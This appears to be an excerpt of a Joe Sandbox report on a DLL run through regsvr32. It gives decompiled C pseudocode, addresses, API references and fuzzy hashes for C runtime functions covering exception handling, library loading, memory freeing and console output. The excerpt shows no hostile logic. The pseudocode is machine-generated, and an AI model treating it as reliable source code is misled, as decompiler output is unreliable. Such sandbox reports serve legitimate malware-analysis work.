C-Code - Quality: 62%

			E6F84A9D0(void* __ecx, signed int __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t68;
				signed int _t75;
				intOrPtr _t76;
				void* _t77;
				signed int _t78;
				intOrPtr _t80;
				signed int _t83;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr _t91;
				signed int _t94;
				char _t96;
				signed int _t102;
				signed int _t103;
				signed int _t110;
				void* _t111;
				intOrPtr _t112;
				signed int _t113;
				signed int _t115;
				void* _t116;
				void* _t117;
				void* _t123;

				_t107 = __edx;
				_t90 = _a4;
				_v5 = 0;
				_v16 = 1;
				 *_t90 = E6F854630(__ecx,  *_t90);
				_t91 = _a8;
				_t6 = _t91 + 0x10; // 0x11
				_t113 = _t6;
				_push(_t113);
				_v20 = _t113;
				_v12 =  *(_t91 + 8) ^  *0x6f85c024;
				E6F84A990(_t91, __edx, _t111, _t113,  *(_t91 + 8) ^  *0x6f85c024);
				E6F84BBFC(_a12);
				_t68 = _a4;
				_t117 = _t116 + 0x10;
				_t112 =  *((intOrPtr*)(_t91 + 0xc));
				if(( *(_t68 + 4) & 0x00000066) != 0) {
					__eflags = _t112 - 0xfffffffe;
					if(_t112 != 0xfffffffe) {
						_t107 = 0xfffffffe;
						E6F84BDF0(_t91, 0xfffffffe, _t113, 0x6f85c024);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t68;
					_v28 = _a12;
					 *((intOrPtr*)(_t91 - 4)) =  &_v32;
					if(_t112 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t94 = _v12;
							_t75 = _t112 + (_t112 + 2) * 2;
							_t91 =  *((intOrPtr*)(_t94 + _t75 * 4));
							_t76 = _t94 + _t75 * 4;
							_t95 =  *((intOrPtr*)(_t76 + 4));
							_v24 = _t76;
							if( *((intOrPtr*)(_t76 + 4)) == 0) {
								_t96 = _v5;
								goto L7;
							} else {
								_t107 = _t113;
								_t77 = E6F84BD90(_t95, _t113);
								_t96 = 1;
								_v5 = 1;
								_t123 = _t77;
								if(_t123 < 0) {
									_v16 = 0;
									L13:
									_push(_t113);
									E6F84A990(_t91, _t107, _t112, _t113, _v12);
									goto L14;
								} else {
									if(_t123 > 0) {
										_t78 = _a4;
										__eflags =  *_t78 - 0xe06d7363;
										if( *_t78 == 0xe06d7363) {
											__eflags =  *0x6f855474;
											if(__eflags != 0) {
												_t87 = E6F8544D0(__eflags, 0x6f855474);
												_t117 = _t117 + 4;
												__eflags = _t87;
												if(_t87 != 0) {
													_t115 =  *0x6f855474; // 0x6f84ab2e
													 *0x6f8551b8(_a4, 1);
													 *_t115();
													_t113 = _v20;
													_t117 = _t117 + 8;
												}
												_t78 = _a4;
											}
										}
										_t108 = _t78;
										E6F84BDD0(_t78, _a8, _t78);
										_t80 = _a8;
										__eflags =  *((intOrPtr*)(_t80 + 0xc)) - _t112;
										if( *((intOrPtr*)(_t80 + 0xc)) != _t112) {
											_t108 = _t112;
											E6F84BDF0(_t80, _t112, _t113, 0x6f85c024);
											_t80 = _a8;
										}
										_push(_t113);
										 *((intOrPtr*)(_t80 + 0xc)) = _t91;
										E6F84A990(_t91, _t108, _t112, _t113, _v12);
										E6F84BDB0();
										asm("int3");
										_push(8);
										_push(0x6f85a6a8);
										E6F849960(_t91, _t112, _t113);
										_t83 = _a4;
										__eflags = _t83;
										if(_t83 != 0) {
											__eflags =  *_t83 - 0xe06d7363;
											if( *_t83 == 0xe06d7363) {
												__eflags =  *((intOrPtr*)(_t83 + 0x10)) - 3;
												if( *((intOrPtr*)(_t83 + 0x10)) == 3) {
													__eflags =  *((intOrPtr*)(_t83 + 0x14)) - 0x19930520;
													if( *((intOrPtr*)(_t83 + 0x14)) == 0x19930520) {
														L29:
														_t102 =  *(_t83 + 0x1c);
														__eflags = _t102;
														if(_t102 != 0) {
															_t110 =  *(_t102 + 4);
															__eflags = _t110;
															if(_t110 == 0) {
																__eflags =  *_t102 & 0x00000010;
																if(( *_t102 & 0x00000010) != 0) {
																	_t83 =  *(_t83 + 0x18);
																	_t103 =  *_t83;
																	__eflags = _t103;
																	if(_t103 != 0) {
																		 *0x6f8551b8(_t103);
																		_t83 =  *((intOrPtr*)( *((intOrPtr*)( *_t103 + 8))))();
																	}
																}
															} else {
																_t54 =  &_v8;
																 *_t54 = _v8 & 0x00000000;
																__eflags =  *_t54;
																_t83 = E6F84ABCF( *(_t83 + 0x18), _t110);
																_v8 = 0xfffffffe;
															}
														}
													} else {
														__eflags =  *((intOrPtr*)(_t83 + 0x14)) - 0x19930521;
														if( *((intOrPtr*)(_t83 + 0x14)) == 0x19930521) {
															goto L29;
														} else {
															__eflags =  *((intOrPtr*)(_t83 + 0x14)) - 0x19930522;
															if( *((intOrPtr*)(_t83 + 0x14)) == 0x19930522) {
																goto L29;
															}
														}
													}
												}
											}
										}
										 *[fs:0x0] = _v20;
										return _t83;
									} else {
										goto L7;
									}
								}
							}
							goto L37;
							L7:
							_t112 = _t91;
						} while (_t91 != 0xfffffffe);
						if(_t96 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L37:
			}

0x6f84a9d0
0x6f84a9d7
0x6f84a9dc
0x6f84a9e2
0x6f84a9ee
0x6f84a9f0
0x6f84a9f6
0x6f84a9f6
0x6f84a9ff
0x6f84aa01
0x6f84aa04
0x6f84aa07
0x6f84aa0f
0x6f84aa14
0x6f84aa17
0x6f84aa1a
0x6f84aa21
0x6f84aa7d
0x6f84aa80
0x6f84aa88
0x6f84aa8f
0x00000000
0x6f84aa8f
0x00000000
0x6f84aa23
0x6f84aa23
0x6f84aa29
0x6f84aa2f
0x6f84aa35
0x6f84aaa0
0x6f84aaa9
0x6f84aa37
0x6f84aa37
0x6f84aa37
0x6f84aa3d
0x6f84aa40
0x6f84aa43
0x6f84aa46
0x6f84aa49
0x6f84aa4e
0x6f84aa64
0x00000000
0x6f84aa50
0x6f84aa50
0x6f84aa52
0x6f84aa57
0x6f84aa59
0x6f84aa5c
0x6f84aa5e
0x6f84aa74
0x6f84aa94
0x6f84aa94
0x6f84aa98
0x00000000
0x6f84aa60
0x6f84aa60
0x6f84aaaa
0x6f84aaad
0x6f84aab3
0x6f84aab5
0x6f84aabc
0x6f84aac3
0x6f84aac8
0x6f84aacb
0x6f84aacd
0x6f84aacf
0x6f84aadc
0x6f84aae2
0x6f84aae4
0x6f84aae7
0x6f84aae7
0x6f84aaea
0x6f84aaea
0x6f84aabc
0x6f84aaf0
0x6f84aaf2
0x6f84aaf7
0x6f84aafa
0x6f84aafd
0x6f84ab05
0x6f84ab09
0x6f84ab0e
0x6f84ab0e
0x6f84ab11
0x6f84ab15
0x6f84ab18
0x6f84ab28
0x6f84ab2d
0x6f84ab2e
0x6f84ab30
0x6f84ab35
0x6f84ab3a
0x6f84ab3d
0x6f84ab3f
0x6f84ab41
0x6f84ab47
0x6f84ab49
0x6f84ab4d
0x6f84ab4f
0x6f84ab56
0x6f84ab6a
0x6f84ab6a
0x6f84ab6d
0x6f84ab6f
0x6f84ab71
0x6f84ab74
0x6f84ab76
0x6f84aba1
0x6f84aba4
0x6f84aba6
0x6f84aba9
0x6f84abab
0x6f84abad
0x6f84abb7
0x6f84abbd
0x6f84abbd
0x6f84abad
0x6f84ab78
0x6f84ab78
0x6f84ab78
0x6f84ab78
0x6f84ab80
0x6f84ab85
0x6f84ab85
0x6f84ab76
0x6f84ab58
0x6f84ab58
0x6f84ab5f
0x00000000
0x6f84ab61
0x6f84ab61
0x6f84ab68
0x00000000
0x00000000
0x6f84ab68
0x6f84ab5f
0x6f84ab56
0x6f84ab4d
0x6f84ab47
0x6f84abc2
0x6f84abce
0x6f84aa62
0x00000000
0x6f84aa62
0x6f84aa60
0x6f84aa5e
0x00000000
0x6f84aa67
0x6f84aa67
0x6f84aa69
0x6f84aa70
0x00000000
0x6f84aa72
0x00000000
0x6f84aa70
0x6f84aa35
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 6F84AA07
___except_validate_context_record.LIBVCRUNTIME ref: 6F84AA0F
_ValidateLocalCookies.LIBCMT ref: 6F84AA98
__IsNonwritableInCurrentImage.LIBCMT ref: 6F84AAC3
_ValidateLocalCookies.LIBCMT ref: 6F84AB18

Strings

csm, xrefs: 6F84AAAD

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: ed5398c53bcb1de0e0a4801a29d772d0212e4ac079169ed7f034b5be1b187b98
Instruction ID: 4c9fa3a732853f1530e56018329829d84e59c0d6292442c93638927a6be0bc57
Opcode Fuzzy Hash: ed5398c53bcb1de0e0a4801a29d772d0212e4ac079169ed7f034b5be1b187b98
Instruction Fuzzy Hash: E6414334A0020DABCF04CF6CC945A9E7BF5AF45328F1089E5D9159F392D735AA16CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6F84DCF3 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6F84DCF3(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x6f85d560 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x6f856200 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E6F84D618(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E6F84D618(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

0x6f84dcfc
0x6f84dda6
0x6f84dd04
0x6f84dd06
0x6f84dd0d
0x6f84dd0f
0x6f84dd15
0x6f84dd22
0x6f84dd37
0x6f84dd3b
0x6f84dd8d
0x6f84dd8d
0x6f84dd92
0x6f84dd96
0x6f84dd99
0x6f84dd99
0x6f84dd9f
0x6f84dda1
0x6f84ddb6
0x6f84ddb1
0x6f84ddb5
0x6f84ddb5
0x6f84dda3
0x6f84dda3
0x00000000
0x6f84dda3
0x6f84dd3d
0x6f84dd46
0x6f84dd7d
0x6f84dd7d
0x6f84dd7f
0x6f84dd81
0x00000000
0x00000000
0x6f84dd89
0x00000000
0x6f84dd89
0x6f84dd50
0x6f84dd55
0x6f84dd5a
0x00000000
0x00000000
0x6f84dd64
0x6f84dd69
0x6f84dd6e
0x00000000
0x00000000
0x6f84dd73
0x6f84dd79
0x00000000
0x6f84dd79
0x6f84dd1a
0x00000000
0x00000000
0x00000000
0x6f84dd20
0x6f84ddaf
0x00000000

Strings

api-ms-, xrefs: 6F84DD4A
ext-ms-, xrefs: 6F84DD5E

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 2dcdf5c5f8a9d152977f2f7fac4ad2e4034413afea350a2e6b73803d990c720a
Instruction ID: 6a864b2d196bbc4965ed7d20344658adaff4d60eecc906a38ef099da5525bbfc
Opcode Fuzzy Hash: 2dcdf5c5f8a9d152977f2f7fac4ad2e4034413afea350a2e6b73803d990c720a
Instruction Fuzzy Hash: A921A273A4572CABDF569A788C44F8A37AA9F42774F110AD1EC16AF280E730F910C5E0

Uniqueness

Uniqueness Score: -1.00%

Function 6F8519AC Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6F8519AC(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E6F851974(_t45, 7);
					E6F851974(_t45 + 0x1c, 7);
					E6F851974(_t45 + 0x38, 0xc);
					E6F851974(_t45 + 0x68, 0xc);
					E6F851974(_t45 + 0x98, 2);
					E6F84DC0E( *((intOrPtr*)(_t45 + 0xa0)));
					E6F84DC0E( *((intOrPtr*)(_t45 + 0xa4)));
					E6F84DC0E( *((intOrPtr*)(_t45 + 0xa8)));
					E6F851974(_t45 + 0xb4, 7);
					E6F851974(_t45 + 0xd0, 7);
					E6F851974(_t45 + 0xec, 0xc);
					E6F851974(_t45 + 0x11c, 0xc);
					E6F851974(_t45 + 0x14c, 2);
					E6F84DC0E( *((intOrPtr*)(_t45 + 0x154)));
					E6F84DC0E( *((intOrPtr*)(_t45 + 0x158)));
					E6F84DC0E( *((intOrPtr*)(_t45 + 0x15c)));
					return E6F84DC0E( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x6f8519b2
0x6f8519b7
0x6f8519c0
0x6f8519cb
0x6f8519d6
0x6f8519e1
0x6f8519ef
0x6f8519fa
0x6f851a05
0x6f851a10
0x6f851a1e
0x6f851a2c
0x6f851a3d
0x6f851a4b
0x6f851a59
0x6f851a64
0x6f851a6f
0x6f851a7a
0x00000000
0x6f851a8a
0x6f851a8f

APIs

Part of subcall function 6F851974: _free.LIBCMT ref: 6F851999

_free.LIBCMT ref: 6F8519FA

Part of subcall function 6F84DC0E: RtlFreeHeap.NTDLL(00000000,00000000,?,6F85199E,?,00000000,?,?,?,6F8519C5,?,00000007,?,?,6F8504FE,?), ref: 6F84DC24
Part of subcall function 6F84DC0E: GetLastError.KERNEL32(?,?,6F85199E,?,00000000,?,?,?,6F8519C5,?,00000007,?,?,6F8504FE,?,?), ref: 6F84DC36

_free.LIBCMT ref: 6F851A05
_free.LIBCMT ref: 6F851A10
_free.LIBCMT ref: 6F851A64
_free.LIBCMT ref: 6F851A6F
_free.LIBCMT ref: 6F851A7A
_free.LIBCMT ref: 6F851A85

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 874b33ac7b038135fd7b901955dcf2b1bab23e57214b65b97104ea2abfc53616
Instruction ID: f3583daa01008669c110712b223fb90102a6bfc14c54cd624bb49c16a0f931ee
Opcode Fuzzy Hash: 874b33ac7b038135fd7b901955dcf2b1bab23e57214b65b97104ea2abfc53616
Instruction Fuzzy Hash: D9119DB2540B08FBDB61EBB4CC09FDB779D5F01308F800D55A2A9AF5D1DB64B81A8680

Uniqueness

Uniqueness Score: -1.00%

Function 6F850921 Relevance: 9.3, APIs: 6, Instructions: 317
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 84%

			E6F850921(void* __eflags, intOrPtr _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				signed char _v40;
				signed int _v44;
				intOrPtr _v48;
				char _v51;
				void _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed char _v80;
				signed int _v84;
				signed int _v88;
				char _v92;
				intOrPtr _v96;
				long _v100;
				signed char* _v104;
				signed char* _v108;
				void* _v112;
				intOrPtr _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t170;
				signed int _t172;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				signed char* _t202;
				void* _t206;
				struct _OVERLAPPED* _t211;
				void* _t220;
				long _t224;
				intOrPtr _t225;
				char _t227;
				void* _t237;
				signed int _t242;
				intOrPtr _t245;
				signed int _t248;
				signed int _t249;
				signed int _t251;
				intOrPtr _t253;
				void* _t259;
				intOrPtr _t260;
				signed int _t261;
				signed char _t264;
				intOrPtr _t267;
				signed char* _t269;
				signed int _t272;
				signed int _t273;
				signed int _t277;
				signed int _t278;
				intOrPtr _t279;
				signed int _t280;
				struct _OVERLAPPED* _t282;
				struct _OVERLAPPED* _t284;
				signed int _t285;
				void* _t286;
				void* _t287;

				_t170 =  *0x6f85c024; // 0x17ad5049
				_v8 = _t170 ^ _t285;
				_t172 = _a8;
				_t264 = _t172 >> 6;
				_t242 = (_t172 & 0x0000003f) * 0x38;
				_t269 = _a12;
				_v108 = _t269;
				_v80 = _t264;
				_v112 =  *((intOrPtr*)(_t242 +  *((intOrPtr*)(0x6f85d638 + _t264 * 4)) + 0x18));
				_v44 = _t242;
				_v96 = _a16 + _t269;
				_t178 = GetConsoleOutputCP();
				_t241 = 0;
				_v124 = _t178;
				E6F84C407( &_v72, _t264, 0);
				_t273 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_t245 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t245;
				_v104 = _t269;
				if(_t269 >= _v96) {
					L48:
					__eflags = _v60 - _t241;
				} else {
					while(1) {
						_t248 = _v44;
						_v51 =  *_t269;
						_v76 = _t241;
						_v40 = 1;
						_t186 =  *((intOrPtr*)(0x6f85d638 + _v80 * 4));
						_v48 = _t186;
						if(_t245 != 0xfde9) {
							goto L19;
						}
						_t211 = _t241;
						_t267 = _v48 + 0x2e + _t248;
						_v116 = _t267;
						while( *((intOrPtr*)(_t267 + _t211)) != _t241) {
							_t211 =  &(_t211->Internal);
							if(_t211 < 5) {
								continue;
							}
							break;
						}
						_t264 = _v96 - _t269;
						_v40 = _t211;
						if(_t211 <= 0) {
							_t72 = ( *_t269 & 0x000000ff) + 0x6f85c760; // 0x0
							_t253 =  *_t72 + 1;
							_v48 = _t253;
							__eflags = _t253 - _t264;
							if(_t253 > _t264) {
								__eflags = _t264;
								if(_t264 <= 0) {
									goto L40;
								} else {
									_t278 = _v44;
									do {
										 *((char*)( *((intOrPtr*)(0x6f85d638 + _v80 * 4)) + _t278 + _t241 + 0x2e)) =  *((intOrPtr*)(_t241 + _t269));
										_t241 =  &(_t241->Internal);
										__eflags = _t241 - _t264;
									} while (_t241 < _t264);
									goto L39;
								}
							} else {
								_v144 = _t241;
								__eflags = _t253 - 4;
								_v140 = _t241;
								_v56 = _t269;
								_v40 = (_t253 == 4) + 1;
								_t220 = E6F85169D( &_v144,  &_v76,  &_v56, (_t253 == 4) + 1,  &_v144);
								_t287 = _t286 + 0x10;
								__eflags = _t220 - 0xffffffff;
								if(_t220 == 0xffffffff) {
									goto L48;
								} else {
									_t279 = _v48;
									goto L18;
								}
							}
						} else {
							_t224 =  *((char*)(( *(_t248 + _v48 + 0x2e) & 0x000000ff) + 0x6f85c760)) + 1;
							_v56 = _t224;
							_t225 = _t224 - _v40;
							_v48 = _t225;
							if(_t225 > _t264) {
								__eflags = _t264;
								if(_t264 > 0) {
									_t280 = _t248;
									do {
										_t227 =  *((intOrPtr*)(_t241 + _t269));
										_t259 =  *((intOrPtr*)(0x6f85d638 + _v80 * 4)) + _t280 + _t241;
										_t241 =  &(_t241->Internal);
										 *((char*)(_t259 + _v40 + 0x2e)) = _t227;
										_t280 = _v44;
										__eflags = _t241 - _t264;
									} while (_t241 < _t264);
									L39:
									_t273 = _v88;
								}
								L40:
								_t277 = _t273 + _t264;
								__eflags = _t277;
								L41:
								__eflags = _v60;
								_v88 = _t277;
							} else {
								_t264 = _v40;
								_t282 = _t241;
								_t260 = _v116;
								do {
									 *((char*)(_t285 + _t282 - 0xc)) =  *((intOrPtr*)(_t260 + _t282));
									_t282 =  &(_t282->Internal);
								} while (_t282 < _t264);
								_t283 = _v48;
								_t261 = _v44;
								if(_v48 > 0) {
									E6F849DB0( &_v16 + _t264, _t269, _t283);
									_t261 = _v44;
									_t286 = _t286 + 0xc;
									_t264 = _v40;
								}
								_t272 = _v80;
								_t284 = _t241;
								do {
									 *( *((intOrPtr*)(0x6f85d638 + _t272 * 4)) + _t261 + _t284 + 0x2e) = _t241;
									_t284 =  &(_t284->Internal);
								} while (_t284 < _t264);
								_t269 = _v104;
								_t279 = _v48;
								_v120 =  &_v16;
								_v136 = _t241;
								_v132 = _t241;
								_v40 = (_v56 == 4) + 1;
								_t237 = E6F85169D( &_v136,  &_v76,  &_v120, (_v56 == 4) + 1,  &_v136);
								_t287 = _t286 + 0x10;
								if(_t237 == 0xffffffff) {
									goto L48;
								} else {
									L18:
									_t269 = _t269 - 1 + _t279;
									L27:
									_t269 =  &(_t269[1]);
									_v104 = _t269;
									_t193 = E6F84FCA5(_v124, _t241,  &_v76, _v40,  &_v32, 5, _t241, _t241);
									_t286 = _t287 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L48;
									} else {
										if(WriteFile(_v112,  &_v32, _t193,  &_v100, _t241) == 0) {
											L47:
											_v92 = GetLastError();
											goto L48;
										} else {
											_t273 = _v84 - _v108 + _t269;
											_v88 = _t273;
											if(_v100 < _v56) {
												goto L48;
											} else {
												if(_v51 != 0xa) {
													L34:
													if(_t269 >= _v96) {
														goto L48;
													} else {
														_t245 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v52 = _t198;
													if(WriteFile(_v112,  &_v52, 1,  &_v100, _t241) == 0) {
														goto L47;
													} else {
														if(_v100 < 1) {
															goto L48;
														} else {
															_v84 = _v84 + 1;
															_t273 = _t273 + 1;
															_v88 = _t273;
															goto L34;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L49;
						L19:
						_t264 =  *((intOrPtr*)(_t248 + _t186 + 0x2d));
						__eflags = _t264 & 0x00000004;
						if((_t264 & 0x00000004) == 0) {
							_v33 =  *_t269;
							_t188 = E6F8502C6(_t264);
							_t249 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t249 * 2)) - _t241;
							if( *((intOrPtr*)(_t188 + _t249 * 2)) >= _t241) {
								_push(1);
								_push(_t269);
								goto L26;
							} else {
								_t100 =  &(_t269[1]); // 0x1
								_t202 = _t100;
								_v56 = _t202;
								__eflags = _t202 - _v96;
								if(_t202 >= _v96) {
									_t264 = _v80;
									_t251 = _v44;
									_t241 = _v33;
									 *((char*)(_t251 +  *((intOrPtr*)(0x6f85d638 + _t264 * 4)) + 0x2e)) = _v33;
									 *(_t251 +  *((intOrPtr*)(0x6f85d638 + _t264 * 4)) + 0x2d) =  *(_t251 +  *((intOrPtr*)(0x6f85d638 + _t264 * 4)) + 0x2d) | 0x00000004;
									_t277 = _t273 + 1;
									goto L41;
								} else {
									_t206 = E6F84E7D9( &_v76, _t269, 2);
									_t287 = _t286 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L48;
									} else {
										_t269 = _v56;
										goto L27;
									}
								}
							}
						} else {
							_t264 = _t264 & 0x000000fb;
							_v24 =  *((intOrPtr*)(_t248 + _t186 + 0x2e));
							_v23 =  *_t269;
							_push(2);
							 *(_t248 + _v48 + 0x2d) = _t264;
							_push( &_v24);
							L26:
							_push( &_v76);
							_t190 = E6F84E7D9();
							_t287 = _t286 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L48;
							} else {
								goto L27;
							}
						}
						goto L49;
					}
				}
				L49:
				if(__eflags != 0) {
					_t183 = _v72;
					_t165 = _t183 + 0x350;
					 *_t165 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t165;
				}
				__eflags = _v8 ^ _t285;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E6F849ADF(_a4, _t241, _v8 ^ _t285, _t264, _a4,  &_v92);
			}

0x6f85092c
0x6f850933
0x6f850936
0x6f85093e
0x6f850941
0x6f85094e
0x6f850951
0x6f850954
0x6f85095b
0x6f850963
0x6f850966
0x6f850969
0x6f85096f
0x6f850971
0x6f850978
0x6f850982
0x6f850984
0x6f850987
0x6f85098a
0x6f85098d
0x6f850990
0x6f850993
0x6f850999
0x6f850ca4
0x6f850ca4
0x00000000
0x6f85099f
0x6f8509a7
0x6f8509aa
0x6f8509b0
0x6f8509b3
0x6f8509ba
0x6f8509c1
0x6f8509c4
0x00000000
0x00000000
0x6f8509cd
0x6f8509d2
0x6f8509d4
0x6f8509d7
0x6f8509dc
0x6f8509e0
0x00000000
0x00000000
0x00000000
0x6f8509e0
0x6f8509e5
0x6f8509e7
0x6f8509ec
0x6f850aa6
0x6f850aad
0x6f850aae
0x6f850ab1
0x6f850ab3
0x6f850c57
0x6f850c59
0x00000000
0x6f850c5b
0x6f850c5b
0x6f850c5e
0x6f850c6d
0x6f850c71
0x6f850c72
0x6f850c72
0x00000000
0x6f850c76
0x6f850ab9
0x6f850abb
0x6f850ac1
0x6f850ac4
0x6f850ad0
0x6f850ad9
0x6f850ae4
0x6f850ae9
0x6f850aec
0x6f850aef
0x00000000
0x6f850af5
0x6f850af5
0x00000000
0x6f850af5
0x6f850aef
0x6f8509f2
0x6f850a01
0x6f850a02
0x6f850a05
0x6f850a08
0x6f850a0d
0x6f850c23
0x6f850c25
0x6f850c27
0x6f850c29
0x6f850c33
0x6f850c3b
0x6f850c3d
0x6f850c3e
0x6f850c42
0x6f850c45
0x6f850c45
0x6f850c49
0x6f850c49
0x6f850c49
0x6f850c4c
0x6f850c4c
0x6f850c4c
0x6f850c4e
0x6f850c4e
0x6f850c52
0x6f850a13
0x6f850a13
0x6f850a16
0x6f850a18
0x6f850a1b
0x6f850a1e
0x6f850a22
0x6f850a23
0x6f850a27
0x6f850a2a
0x6f850a2f
0x6f850a39
0x6f850a3e
0x6f850a41
0x6f850a44
0x6f850a44
0x6f850a47
0x6f850a4a
0x6f850a4c
0x6f850a55
0x6f850a59
0x6f850a5a
0x6f850a5e
0x6f850a64
0x6f850a6d
0x6f850a7a
0x6f850a81
0x6f850a85
0x6f850a90
0x6f850a95
0x6f850a9b
0x00000000
0x6f850aa1
0x6f850af8
0x6f850af9
0x6f850b7c
0x6f850b83
0x6f850b8b
0x6f850b93
0x6f850b98
0x6f850b9b
0x6f850ba0
0x00000000
0x6f850ba6
0x6f850bbb
0x6f850c9b
0x6f850ca1
0x00000000
0x6f850bc1
0x6f850bca
0x6f850bcc
0x6f850bd2
0x00000000
0x6f850bd8
0x6f850bdc
0x6f850c12
0x6f850c15
0x00000000
0x6f850c1b
0x6f850c1b
0x00000000
0x6f850c1b
0x6f850bde
0x6f850be0
0x6f850be2
0x6f850bfb
0x00000000
0x6f850c01
0x6f850c05
0x00000000
0x6f850c0b
0x6f850c0b
0x6f850c0e
0x6f850c0f
0x00000000
0x6f850c0f
0x6f850c05
0x6f850bfb
0x6f850bdc
0x6f850bd2
0x6f850bbb
0x6f850ba0
0x6f850a9b
0x6f850a0d
0x00000000
0x6f850afd
0x6f850afd
0x6f850b01
0x6f850b04
0x6f850b26
0x6f850b29
0x6f850b2e
0x6f850b32
0x6f850b36
0x6f850b64
0x6f850b66
0x00000000
0x6f850b38
0x6f850b38
0x6f850b38
0x6f850b3b
0x6f850b3e
0x6f850b41
0x6f850c78
0x6f850c7b
0x6f850c7e
0x6f850c88
0x6f850c93
0x6f850c98
